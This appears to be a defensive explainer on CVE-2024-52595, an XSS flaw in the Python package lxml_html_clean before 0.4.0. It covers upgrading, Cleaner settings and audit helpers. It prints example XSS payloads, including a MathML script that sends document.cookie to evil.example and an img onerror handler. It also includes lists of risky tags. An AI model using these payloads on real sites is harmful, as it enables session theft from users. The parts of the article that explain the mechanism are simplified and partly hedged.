CVE-2024-52595 - XSS Vulnerability in lxml_html_clean’s HTML Sanitization

CVE-2024-52595 is a critical security vulnerability affecting the lxml_html_clean project, which is commonly used to sanitize HTML content in Python applications. If your application allows users to input HTML and you use this tool to clean it, you could be at risk—hackers might inject JavaScript and compromise your site's security, all due to how certain HTML tags are parsed and sanitized.

In this article, we’ll explore in simple terms how this vulnerability works, what attackers can do, and how you can protect yourself with examples and practical code.

What Is lxml_html_clean?

lxml_html_clean is a Python package that provides the HTML cleaning features originally from lxml.html.clean. It is designed to strip out unwanted tags, attributes, and scripts from untrusted HTML, making it safe to display as user-generated content on your site or app.

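Problem: Prior to version 0.4.0, lxml_html_clean has a crucial flaw in how it handles special HTML tags such as <svg>, <math>, and <noscript>. The underlying HTML parser does not perform "context-switching" inside these tags the way a real web browser does, so the cleaner and the browser can disagree about what a piece of markup means. In particular, content inside CSS comments is ignored by the cleaner but may be interpreted differently by browsers, which lets malicious scripts slip past the cleaning step.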

Context-Switching Explained

When a web browser parses HTML and encounters special tags like <svg> or <math>, it can switch parsing *modes* because those tags belong to different "namespaces." This allows attackers to sneak in JavaScript or other dangerous content using browser parsing quirks.

CSS comments inside these tags can hide scripts or active content. Browsers and lxml_html_clean interpret these comments differently. While the cleaning function skips over them, the browser may *not*—causing malicious code to be executed.
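To make the comment mismatch concrete, here is a deliberately simplified sketch. It is not the library's actual code: `naive_style_check` is a hypothetical checker that discards CSS comments before scanning, `strict_style_check` is a hypothetical alternative that scans the raw text, and the style content is an illustrative string rather than a confirmed exploit. The point is only that anything "hidden" in a comment becomes invisible to a checker that strips comments first, while a browser that parses the same text under different rules may still act on it.

```python
import re

# Matches CSS comments such as /* ... */, including across newlines.
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Substrings a checker might treat as suspicious (illustrative, not exhaustive).
SUSPICIOUS = ("<script", "onerror", "javascript:")


def naive_style_check(style_text: str) -> bool:
    """Hypothetical checker: drops CSS comments first, then scans what is left."""
    visible = CSS_COMMENT.sub("", style_text).lower()
    return any(marker in visible for marker in SUSPICIOUS)


def strict_style_check(style_text: str) -> bool:
    """Hypothetical checker: scans the raw text, comments included."""
    raw = style_text.lower()
    return any(marker in raw for marker in SUSPICIOUS)


# Illustrative style content that hides markup inside a CSS comment.
style_text = "/* <img src=x onerror=alert(1)> */"

print(naive_style_check(style_text))   # False: the comment was discarded before scanning
print(strict_style_check(style_text))  # True: the raw text still contains "onerror"
```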

Let’s say you clean this HTML input from a user with a version of lxml_html_clean older than 0.4.0:

<svg>
  <script><!--
    alert('XSS');
  //--></script>
</svg>

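- lxml_html_clean (before 0.4.0): Treats the content inside the comment as inert and, depending on how the Cleaner is configured, can pass the markup through. Note that the Cleaner removes <script> elements under its default settings, so whether a given payload survives depends on your configuration.
- Browser: Reads the <script>, executes the code inside the comment, and shows a popup alert. The attack succeeds: XSS (Cross-Site Scripting).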

Exploit Flow

1. Attacker submits HTML containing <svg>, <math>, or <noscript> tags, often embedding JavaScript in sneaky ways.
2. lxml_html_clean processes the content, doesn't properly switch parsing context, and outputs HTML as if it's safe.
3. Browser reads the page, but interprets the special tags per modern web standards, executing scripts that lxml_html_clean missed.
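One way to act on the flow above is to screen untrusted input for the context-switching tags before it ever reaches the cleaner. The following is a minimal sketch using only the Python standard library; `find_context_switching_tags` and `CONTEXT_SWITCHING_TAGS` are hypothetical names introduced here, and the standard-library parser does not emulate browser parsing either, so treat this as a coarse early-warning check rather than a sanitizer.

```python
from html.parser import HTMLParser

# Tags the advisory names as triggering a parsing-context switch in browsers.
CONTEXT_SWITCHING_TAGS = {"svg", "math", "noscript"}


class _TagCollector(HTMLParser):
    """Records every context-switching start tag seen in the input."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag names before calling this method.
        if tag in CONTEXT_SWITCHING_TAGS:
            self.found.append(tag)


def find_context_switching_tags(html):
    """Return the context-switching tags found in html, in document order."""
    parser = _TagCollector()
    parser.feed(html)
    parser.close()
    return parser.found


print(find_context_switching_tags("<p>hi</p><SVG><script>alert(1)</script></svg>"))  # ['svg']
print(find_context_switching_tags("<b>plain</b>"))  # []
```

An application could reject or log any submission for which this function returns a non-empty list, then still run the cleaner on everything it accepts.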

Example 1: Script Inside SVG

Input HTML:

<svg><script><!--
alert('XSS')
//--></script></svg>

The sanitizer lets it through, but in the browser, the script runs.

Example 2: Using MathML

<math><script>window.location='https://evil.example/steal?cookie='+document.cookie</script></math>

Same problem—sanitizer misses the script, browser executes it.

Example 3: Noscript Trick

<noscript><img src="x" onerror="alert('XSS from noscript')"></noscript>

Depending on how sanitization is configured, this might sneak through.

How to Protect Yourself

1. Update lxml_html_clean to at least 0.4.0

The new version fixes CVE-2024-52595. Upgrade now:

pip install -U lxml-html-clean
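After upgrading, it can be worth confirming which version is actually installed in the environment your application runs in. The sketch below uses only the standard library; `parse_version`, `is_patched`, and `installed_version` are hypothetical helpers, the distribution name is assumed to match the pip name above, and the version parsing is intentionally simplistic (it ignores pre-release suffixes such as "rc1").

```python
import re
from importlib import metadata

MINIMUM_FIXED = (0, 4, 0)  # first release containing the fix, per the advisory


def parse_version(version):
    """Turn a string like '0.4.0' into a tuple of three ints."""
    parts = []
    for piece in version.split(".")[:3]:
        match = re.match(r"\d+", piece)
        parts.append(int(match.group()) if match else 0)
    while len(parts) < 3:
        parts.append(0)  # pad '0.4' to (0, 4, 0)
    return tuple(parts)


def is_patched(version):
    """True if the given version string is at or above the fixed release."""
    return parse_version(version) >= MINIMUM_FIXED


def installed_version(dist_name="lxml-html-clean"):
    """Return the installed version string, or None if the package is absent."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


current = installed_version()
if current is None:
    print("lxml-html-clean is not installed in this environment")
elif is_patched(current):
    print(f"lxml-html-clean {current} includes the fix")
else:
    print(f"lxml-html-clean {current} is vulnerable; upgrade to 0.4.0 or later")
```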

2. Temporary Mitigations: Cleaner Configuration

If you *cannot* upgrade immediately, you can strongly limit what tags are allowed or how they're handled.

Example: Using allow_tags to Block Malicious Tags

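from lxml_html_clean import Cleaner

# Allow only a small set of formatting tags; svg, math, and noscript are excluded
SAFELIST = ['b', 'em', 'i', 'strong', 'p']

cleaner = Cleaner(
    allow_tags=SAFELIST,        # Strip every tag that is not on the list
    remove_unknown_tags=False,  # Required: allow_tags raises ValueError if combined with the default remove_unknown_tags=True
)
dirty_html = "<svg><script>alert(1)</script></svg><b>Safe</b>"
clean_html = cleaner.clean_html(dirty_html)
print(clean_html)
# Expected: only <b>Safe</b> survives (lxml may wrap the result in a container element such as <div>)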

Example: Using kill_tags for SVG, Math, Noscript

from lxml_html_clean import Cleaner

cleaner = Cleaner(
    kill_tags=['svg', 'math', 'noscript']
)
dirty_html = "<svg><script>alert(1)</script></svg><p>Hello!</p>"
clean_html = cleaner.clean_html(dirty_html)
print(clean_html)
# Expected: the <svg> subtree is removed and <p>Hello!</p> remains (lxml may wrap the result in a container <div>)

Summary Table

| Action                        | Safety                |
|-------------------------------|-----------------------|
| Still using a version < 0.4.0 | Vulnerable to XSS     |
| Upgraded to 0.4.0 or later    | Protected             |
| Using allow_tags              | Safer but not perfect |
| Using kill_tags               | Safer but not perfect |

Double-check your cleaning settings and do not trust default behavior blindly.
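A small regression check can help verify a configuration instead of trusting it. The sketch below feeds the example payloads from this article through any sanitizer function and reports output that still contains risky tags or event-handler attributes. `audit`, `check_sanitizer`, and `RISKY_TAGS` are hypothetical names, the check uses the standard-library parser (which does not emulate browser behavior), and a clean report does not prove that a configuration is safe.

```python
from html.parser import HTMLParser

# Tags that should not appear in sanitized output for this threat model.
RISKY_TAGS = {"script", "svg", "math", "noscript"}


class _OutputAuditor(HTMLParser):
    """Collects risky tags and on* event-handler attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in RISKY_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, _value in attrs:
            # Attribute names arrive lowercased, so "onerror", "onclick", etc. match.
            if name.startswith("on"):
                self.findings.append(f"{name} attribute on <{tag}>")


def audit(html):
    """Return a list of human-readable findings for the given HTML string."""
    auditor = _OutputAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# The three example payloads discussed in this article.
PAYLOADS = [
    "<svg><script><!--\nalert('XSS')\n//--></script></svg>",
    "<math><script>alert(1)</script></math>",
    "<noscript><img src=\"x\" onerror=\"alert('XSS from noscript')\"></noscript>",
]


def check_sanitizer(sanitize):
    """Map each payload whose sanitized output looks risky to its findings."""
    failures = {}
    for payload in PAYLOADS:
        findings = audit(sanitize(payload))
        if findings:
            failures[payload] = findings
    return failures


# An identity function stands in for a cleaner that lets everything through.
print(len(check_sanitizer(lambda html: html)))  # 3
```

To test a real configuration, pass the cleaner's own method instead of the identity function, for example `check_sanitizer(cleaner.clean_html)` with a `Cleaner` instance like the ones shown earlier.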

For more details, see the original advisory and the project changelog.

References

- Official CVE report
- lxml_html_clean PyPI
- lxml_html_clean GitHub
- Release v0.4.0 - Changelog

Timeline

Published on: 11/19/2024 22:15:21 UTC
Last modified on: 11/25/2024 14:27:38 UTC